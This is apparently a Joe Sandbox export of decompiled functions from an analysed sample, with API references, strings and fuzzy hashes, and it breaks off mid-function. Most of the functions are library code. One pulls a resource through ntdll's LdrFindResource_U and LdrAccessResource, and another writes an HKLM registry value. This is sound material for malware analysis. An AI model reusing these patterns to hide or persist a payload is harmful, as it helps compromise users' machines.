0x00410b33
0x00410b39
0x00410b3e
0x00410b42
0x00410b42
0x00410b46
0x00410b4a
0x00410b4d
0x00410b51
0x00410b54
0x00410b5b
0x00410b5e
0x00410b66
0x00410b60
0x00410b60
0x00410b60
0x00410b6d
0x00410b92
0x00410b99
0x00410ba2
0x00410baa
0x00410bb7
0x00410bba
0x00410bc0
0x00410bc6
0x00410b74
0x00410b74
0x00410b7b
0x00410b80
0x00410b8a
0x00410b8f
0x00000000
0x00000000
0x00000000
0x00000000
0x00410b80
0x00410b6d
0x00410b23
0x00410bc7
0x00410bc8
0x00410aa8
0x00410aa8
0x00410aa8
0x00410bd5

APIs

GlobalLock.KERNEL32 ref: 00410AB3
lstrlenA.KERNEL32(?), ref: 00410AFB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00410B15

Strings

System, xrefs: 00410AAF

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 60c34cc932e0d0d5f620731a07cb8a59de673b6203500529a3185df5c7ea08ab
Instruction ID: 77f56c5e0b70ae88688f1258a2549f44d8c60beea92c973b3041d18e2da12858
Opcode Fuzzy Hash: 60c34cc932e0d0d5f620731a07cb8a59de673b6203500529a3185df5c7ea08ab
Instruction Fuzzy Hash: 8641B171904219DFCB14DFE4C885AEEBBB5FF44318F14812AE412EB285E7B8A9C5CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004120C5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E004120C5(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t77;

				_t76 = __esi;
				_t75 = __edi;
				_push(0x20);
				E0041F753(E00432B84, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x43688c;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t77 - 4) = 2;
				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E00419E18(_t59, _t59 + 0x24, _t75);
						E0040ED13(_t59 + 0x64);
						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
						_push(_t77 - 0x20);
						if(E0040EEC3(_t59, 0x4393e0) >= 0) {
							_t76 = "mfcm80.dll";
							_t75 = _t77 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t77 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t77 - 0x20));
								}
							}
							_t45 =  *(_t77 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t77 - 4) = 1;
						E0041A1FB(_t59 + 0x40);
						 *(_t77 - 4) = 0;
						E00419FED(_t59, _t59 + 0x24, _t75);
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						E00404913(_t59);
						return E0041F7D6(_t59, _t75, _t76);
					}
					_t75 = _t59 + 0x40;
					do {
						_t76 = E0041A142(_t59, _t75, _t75, _t76);
						_t85 = _t76;
						if(_t76 != 0) {
							E00411888(_t76);
							_push(_t76);
							E00402F0C(_t59, _t75, _t76, _t85);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t75 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
						_t76 =  *((intOrPtr*)(E00406B97(_t77 - 0x24)));
						if(_t76 != 0) {
							_t54 =  *((intOrPtr*)(_t76 + 4));
							if(_t54 != 0) {
								_t82 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E0041A173(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
									E00411888(_t76);
									_push(_t76);
									E00402F0C(_t59, _t75, _t76, _t82);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t77 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}

0x004120c5
0x004120c5
0x004120c5
0x004120cc
0x004120d1
0x004120d3
0x004120d6
0x004120dc
0x004120e1
0x004120e8
0x004120eb
0x00412133
0x00412137
0x0041215d
0x00412160
0x00412169
0x0041216e
0x00412175
0x00412184
0x00412186
0x0041218b
0x0041218e
0x0041218f
0x00412190
0x00412196
0x00412197
0x0041219f
0x004121a7
0x004121af
0x004121b4
0x004121b6
0x004121af
0x004121b7
0x004121bd
0x004121bd
0x004121c3
0x004121c7
0x004121cf
0x004121d3
0x004121d8
0x004121de
0x004121e8
0x004121e8
0x00412139
0x0041213c
0x00412143
0x00412145
0x00412147
0x0041214b
0x00412150
0x00412151
0x00412156
0x00412157
0x00000000
0x004120ed
0x004120ed
0x004120f0
0x004120f0
0x004120fe
0x00412102
0x00412104
0x00412109
0x0041210b
0x00412112
0x00412119
0x00412120
0x00412125
0x00412126
0x0041212b
0x00412112
0x00412109
0x0041212c
0x0041212f
0x00000000
0x004120f0

APIs

__EH_prolog3_GS.LIBCMT ref: 004120CC
GetModuleHandleA.KERNEL32(?,004393E0,00000000), ref: 00412197
GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 004121A7

Strings

mfcm80.dll, xrefs: 00412186
MFCM80ReleaseManagedReferences, xrefs: 004121A1

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: AddressH_prolog3_HandleModuleProc
String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
API String ID: 2418878492-2500072749
Opcode ID: b8a823503778c49e59a79fea30dc8b9f381be7c146b62c3227563022fb454cd2
Instruction ID: 22469c7bcacca5b825b37335fd20bb5c9480a0c645dc819855c5a6f900c70753
Opcode Fuzzy Hash: b8a823503778c49e59a79fea30dc8b9f381be7c146b62c3227563022fb454cd2
Instruction Fuzzy Hash: 5A319E31A00205ABCF15EFA1C9457EE77B5AF49304F1440AEE904EB292DBBCDD85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD1D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040FD1D(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E0040DBC7(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E0040DB94(_t51, _t65, 0, _t77) + 4));
					_t70 = E0040F089(0x44642c);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E00421C45(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E0041E18A(_t51, _t66, _t70, _t83);
								}
								_t37 = E0041ECA7(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E0041ECA7(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E00421C45(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E00404C1E();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E0040FC51( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E0040FC51( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E0040FC51( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E0040FC51( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E0040FC51( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

0x0040fd1d
0x0040fd1d
0x0040fd27
0x0040fd29
0x0040fd30
0x0040fe08
0x0040fe13
0x0040fe13
0x0040fd36
0x0040fd39
0x0040fd3c
0x00000000
0x00000000
0x0040fd45
0x0040fd89
0x0040fd89
0x0040fd8f
0x0040fd9c
0x0040fda0
0x0040fe07
0x00000000
0x0040fda6
0x0040fda6
0x0040fda9
0x0040fdab
0x0040fdbc
0x0040fdc3
0x0040fdc5
0x0040fdc8
0x0040fdcc
0x0040fdce
0x0040fdd0
0x0040fdd1
0x0040fdd6
0x0040fdd9
0x0040fddc
0x0040fde2
0x0040fde9
0x0040fdf1
0x0040fdf4
0x0040fe04
0x0040fe04
0x0040fdf4
0x00000000
0x0040fdc3
0x0040fdad
0x0040fdba
0x00000000
0x00000000
0x00000000
0x0040fdba
0x0040fda0
0x0040fd4b
0x0040fd4d
0x0040fd54
0x0040fd56
0x0040fd59
0x0040fd5b
0x0040fd5f
0x0040fd5f
0x0040fd5b
0x0040fd54
0x0040fd64
0x0040fd6c
0x0040fd74
0x0040fd7c
0x0040fd84
0x00000000

APIs

__msize.LIBCMT ref: 0040FDAE
__msize.LIBCMT ref: 0040FDD1
_malloc.LIBCMT ref: 0040FDE9
_malloc.LIBCMT ref: 0040FDFE

Strings

,dD, xrefs: 0040FD92

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: __msize_malloc
String ID: ,dD
API String ID: 1288803200-3191229884
Opcode ID: 58876fb9e627804367ae5f76963656d2a1121e4b44d7c996d452b15496b7a07f
Instruction ID: 2f4e633648d44568a440bb3fa2de23a969c37f1f238f370252bd419c8cc87b54
Opcode Fuzzy Hash: 58876fb9e627804367ae5f76963656d2a1121e4b44d7c996d452b15496b7a07f
Instruction Fuzzy Hash: 5E2173315002109FDB34AF72D885A6B77A4BF44714B14853FEC19AAAD6DB38EC85CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0042CC9A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042CC9A() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x4483c0;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x4483c0 = _t5;
				}
				_t6 = E004265A8(_t5, 4);
				 *0x4473b8 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x4442e0;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x444560) {
							break;
						}
						_t6 =  *0x4473b8; // 0x2351ea8
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x4442f0;
					do {
						_t10 =  *((intOrPtr*)((_t20 & 0x0000001f) * 0x28 +  *((intOrPtr*)(0x4483e0 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x444350);
					return 0;
				} else {
					 *0x4483c0 = _t26;
					_t6 = E004265A8(_t26, 4);
					 *0x4473b8 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x0042cc9a
0x0042cca4
0x0042cca5
0x0042ccb0
0x0042ccb2
0x00000000
0x0042ccb2
0x0042cca7
0x0042cca7
0x0042ccb4
0x0042ccb4
0x0042ccb4
0x0042ccbc
0x0042ccc5
0x0042ccca
0x0042ccea
0x0042ccea
0x0042ccec
0x0042ccf8
0x0042ccf8
0x0042ccfb
0x0042ccfe
0x0042cd07
0x00000000
0x00000000
0x0042ccf3
0x0042ccf3
0x0042cd0b
0x0042cd0c
0x0042cd0e
0x0042cd14
0x0042cd28
0x0042cd2e
0x0042cd38
0x0042cd38
0x0042cd3a
0x0042cd3d
0x0042cd3e
0x0042cd4a
0x0042cccc
0x0042cccf
0x0042ccd5
0x0042ccde
0x0042cce3
0x00000000
0x0042cce5
0x0042cce7
0x0042cce9
0x0042cce9
0x0042cce3

APIs

__calloc_crt.LIBCMT ref: 0042CCBC
__calloc_crt.LIBCMT ref: 0042CCD5

Strings

PCD, xrefs: 0042CD3E
BD, xrefs: 0042CCEC
`ED, xrefs: 0042CD01

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: __calloc_crt
String ID: PCD$`ED$BD
API String ID: 3494438863-3786296796
Opcode ID: ee61e886c595784a642732bd44bf13424e53494a76758dd75d135ed60843f2d1
Instruction ID: 5d6bc2e65ec50afa7cfd9c24b92ad8cceccf8fb15337d2a1a44d9866e0da7712
Opcode Fuzzy Hash: ee61e886c595784a642732bd44bf13424e53494a76758dd75d135ed60843f2d1
Instruction Fuzzy Hash: 6F11E7323482205BF7149F6EBCD076E2791FB96B24BA4413FF905C7294DB3C8882468C

Uniqueness

Uniqueness Score: -1.00%

Function 00407923, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00407923(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E00407777() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E004215F5(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x446290(_a4, _a8);
			}

0x00407930
0x00407949
0x004079b4
0x004079b4
0x004079b6
0x00000000
0x004079b7
0x0040794b
0x00407952
0x00000000
0x0040796b
0x0040796c
0x0040796f
0x0040797d
0x00407980
0x00407988
0x00407989
0x0040798a
0x0040798b
0x00407992
0x00407995
0x00407999
0x004079a8
0x004079ad
0x004079b0
0x00000000
0x004079b0
0x00407952
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 00407961
GetSystemMetrics.USER32 ref: 00407979
GetSystemMetrics.USER32 ref: 00407980

Strings

DISPLAY, xrefs: 0040799D
B, xrefs: 00407940

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 2926c6d18e6f0b630ebea8befa15ebd50504e40b77fdf81e56c32f1ff9cf5217
Instruction ID: f4921b07837d5c35b9459696712d0f96a64d958530ee0b5bfefb63986bd7101a
Opcode Fuzzy Hash: 2926c6d18e6f0b630ebea8befa15ebd50504e40b77fdf81e56c32f1ff9cf5217
Instruction Fuzzy Hash: BA11CAB1A04324ABDF119F649D81A9B7B68EF09750F004077FD05BE196D2B5F900CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 00405D8B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D8B(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E0040810E(__ecx, __eflags, _t26) == 0) {
					_t10 = E0040A584(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E00408550(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E0040F7F5(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

0x00405d8b
0x00405d8b
0x00405d8d
0x00405d92
0x00405d9b
0x00405da4
0x00405da9
0x00405dab
0x00405db7
0x00405db7
0x00405dbe
0x00405e19
0x00000000
0x00405e1c
0x00405dc0
0x00405dc3
0x00405dc6
0x00405dcd
0x00405dd7
0x00405dd9
0x00000000
0x00000000
0x00405de2
0x00405de7
0x00405de9
0x00000000
0x00000000
0x00405df0
0x00405df6
0x00405df8
0x00405e05
0x00405e11
0x00000000
0x00405e11
0x00405dfb
0x00405e01
0x00405e03
0x00000000
0x00000000
0x00000000
0x00405e03
0x00405dc8
0x00405dcb
0x00000000
0x00000000
0x00000000
0x00405dcb
0x00405dad
0x00405db1
0x00000000
0x00000000
0x00000000
0x00405db3
0x00405d9d
0x00000000

Strings

Edit, xrefs: 00405DDB

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: cadf5cdf105f9b2e6c32f1f83ab6765bdb8c0ead7ddf9359437142abd91223ca
Instruction ID: 357ecc9c0fe06753b2f7ef8780776397737a938da9b130e61a6109f3b055d991
Opcode Fuzzy Hash: cadf5cdf105f9b2e6c32f1f83ab6765bdb8c0ead7ddf9359437142abd91223ca
Instruction Fuzzy Hash: B4018430210A01A7EA203B26DC09B9BB7A5EF94754F14483BB581F22E2DB7CDD61CD9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401A70, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00401A70(void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				char _v28;
				_Unknown_base(*)()* _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;

				_v44 = 0;
				_v28 = 0;
				_v16 = _a8;
				_v12 = _a4;
				_v8 = _a12;
				_v20 = E00401A10(L"ntdll.dll");
				_v24 = GetProcAddress(_v20, "LdrFindResource_U");
				_v32 = GetProcAddress(_v20, "LdrAccessResource");
				_v40 = _v24(0x400000,  &_v16, 3,  &_v36);
				if(_v40 >= 0) {
					_v40 = _v32(0x400000, _v36,  &_v44,  &_v28);
					if(_v40 >= 0 && _a16 != 0) {
						 *_a16 = _v28;
					}
				}
				return _v44;
			}

0x00401a76
0x00401a7d
0x00401a87
0x00401a8d
0x00401a93
0x00401aa3
0x00401ab5
0x00401ac7
0x00401adc
0x00401ae3
0x00401af9
0x00401b00
0x00401b0e
0x00401b0e
0x00401b00
0x00401b16

APIs

GetProcAddress.KERNEL32(?,LdrFindResource_U), ref: 00401AAF
GetProcAddress.KERNEL32(?,LdrAccessResource), ref: 00401AC1

Strings

LdrFindResource_U, xrefs: 00401AA6
ntdll.dll, xrefs: 00401A96
LdrAccessResource, xrefs: 00401AB8

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: AddressProc
String ID: LdrAccessResource$LdrFindResource_U$ntdll.dll
API String ID: 190572456-309990276
Opcode ID: fd4fbc9ac952d96f1e106f0f94c6f3281e9f40c0831bf339fd2d1916f06a4695
Instruction ID: 8a5841fff638097e8a695f73e2a584e1330be098e6ee4213b5b30c9d0d5cad24
Opcode Fuzzy Hash: fd4fbc9ac952d96f1e106f0f94c6f3281e9f40c0831bf339fd2d1916f06a4695
Instruction Fuzzy Hash: F521E7B4D002099FDB04DF94D945BEEBBB4FF88304F10446AE915B7290E778AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402560, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402560(intOrPtr __ecx, CHAR* _a4) {
				void* _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				int _t18;
				char* _t27;
				char* _t28;

				_v20 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_t27 =  *0x442000; // 0x4346d4
				_v16 = RegCreateKeyExA(0x80000002, _t27, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
				if(_v16 == 0) {
					_t18 = lstrlenA(_a4);
					_t28 =  *0x442010; // 0x43465c
					_v16 = RegSetValueExA(_v8, _t28, 0, 1, _a4, _t18 + 1);
					RegCloseKey(_v8);
				}
				return _v16;
			}

0x00402566
0x00402569
0x00402570
0x0040258c
0x0040259e
0x004025a5
0x004025ab
0x004025bd
0x004025ce
0x004025d5
0x004025d5
0x004025e1

APIs

RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402598
lstrlenA.KERNEL32(?), ref: 004025AB
RegSetValueExA.ADVAPI32(00000000,0043465C,00000000,00000001,?,-00000001), ref: 004025C8
RegCloseKey.ADVAPI32(00000000), ref: 004025D5

Strings

\FC, xrefs: 004025BD

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: \FC
API String ID: 1356686001-3541169775
Opcode ID: c7a0b32510f0cb6109f82215027c5292be295ddd1e68631b43d5b4ef6fa880fd
Instruction ID: 459d6452fb9c9d5ccab35ccbd8606333e30272a4718eec85ccb3f9d8e5713986
Opcode Fuzzy Hash: c7a0b32510f0cb6109f82215027c5292be295ddd1e68631b43d5b4ef6fa880fd
Instruction Fuzzy Hash: 8701EDB9A00208BBDB14DF94DD49FAEB7B9EB48700F108159F615A7280D6B56A00DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041295B, Relevance: 7.6, APIs: 5, Instructions: 108
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041295B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E0041F6EA(E00432C4E, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x412b1b) & 0x000000ff) * 4 +  &M00412AF3))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
